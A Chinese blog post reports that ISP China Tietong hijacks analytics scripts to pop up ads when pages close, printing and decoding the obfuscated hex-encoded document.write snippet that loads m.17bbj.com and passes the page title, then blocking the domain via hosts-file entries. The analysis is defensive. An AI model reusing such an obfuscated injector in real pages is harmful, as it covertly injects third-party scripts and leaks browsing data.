最近关闭一些网站时,老是弹出一些广告,大多是网游、考考你之类诈骗网站,刚开始以为是关闭的那个网页放的广告,可是最近越来越频繁,而且老是这几个广告,开始怀疑是否自己中招,可是自己一直裸奔上网,所以系统一直很干净,简单排查以下排除自己中毒,而且使用代理的时候没有弹出现象,上网搜了搜相关广告网站,才发现是垃圾铁通搞的鬼,如果网页中含有它所劫持一些统计网站js,统计代码的前面会被加上加上铁通的广告js调用,那样在关闭的网页的时候就会弹出广告。
由于第一次访问soso使用了google的广告js,所以第一次使用soso搜索后。关闭搜索页会自动弹出广告,下面以次为例说明:
首先,清空ie临时文件夹,访问soso.com,随便搜索一个词,会在ie临时文件夹下发现一个文件——show_afs_ads_cn.js,如下图:
打开它,你会发现如下代码:
var _0x9713=["x3Cx73x63x72x69x70x74x20x6Cx61x6Ex67x75x61x67x65x3Dx27x6Ax61x76x61x73x63x72x69x70x74x27x20x73x72x63x3Dx27x68x74x74x70x3Ax2Fx2Fx6Dx2Ex31x37x62x62x6Ax2Ex63x6Fx6Dx2Fx6Dx77x67x6Ex64x66x61x2Ex70x68x70x3Fx73x72x63x3Dx67x67x26x74x3D","x74x69x74x6Cx65","x27x3Ex3Cx2Fx73x63x72x69x70x74x3E","x77x72x69x74x65"];document[_0x9713[0x3]](_0x9713[0x0]+encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write("<script language='javascript' src='http://www.google.cn/afsonline/show_afs_ads_cn.js?rr=1886680168'></script>");前面的变量_0x9713就是一连串的转换成16进制ASCII码组成的数组,换成正常js代码就是:
var _0x9713=["<script language='javascript' src='http://m.17bbj.com/mwgndfa.php?src=gg&t=","title","'></script>","write"];
由此可知,铁通通过document.write写网页,把打开广告的代码通过m.17bbj.com/mwgndfa.php返回,而且通过嗅探也可以看到访问过m.17bbj.com这个网址。
所以只要m.17bbj.com无法访问就可以阻止广告页弹出,修改system32/drivers/etc/里的hosts文件,添加:
127.0.0.1 m.17bbj.com 127.0.0.1 17bbj.com
重启,即可。当然了铁通要是换一个网站就还得重新找出弹广告的地址。
铁通弹广告现在做的很隐蔽,不像之前的是插入页面,现在是关闭网页弹出,好像通过cookie设置或者某些时段劫持,一定时间内只弹出一次,给用户的感觉弹出的广告是因为刚才访问的原因。强烈谴责铁通这种无耻行径,这不仅侵犯铁通用户的权益,而且对铁通用户的电脑安全也构成威胁,希望有次现象的都到工信部电信申诉投诉他们,
到目前为止,好像没一家isp是干净的吧,中国上网真悲哀,isp强奸,收费贵,网速低,还有墙过滤。
ps: 昨天投诉到工信部,今天晚上,有铁通客服mm来电话询问相关情况,说是之后给回电话,所以大家都去工信部投诉,人多了相关责任人肯定会被过问的。工信部投诉网站:
http://dxss.miit.gov.cn:8080/LeaderMail/LeaderMail.jsp
pss: 24日,铁通又回电话了,它们也不清楚是怎么回事,而且说一些名词,对方也不清楚,但还是很客气,只是说投诉工信部,下面的人压力很大,他会往上反应,感觉地市上不可能干这些的,估计省里的或者总部有工作人员偷偷干的。
相关网页:
http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html
http://www.kuaizhuan.info/?p=566
12月2日更新:
现在m.17bbj.com的ip说明就是铁通搞得,附123cha.com的查询结果
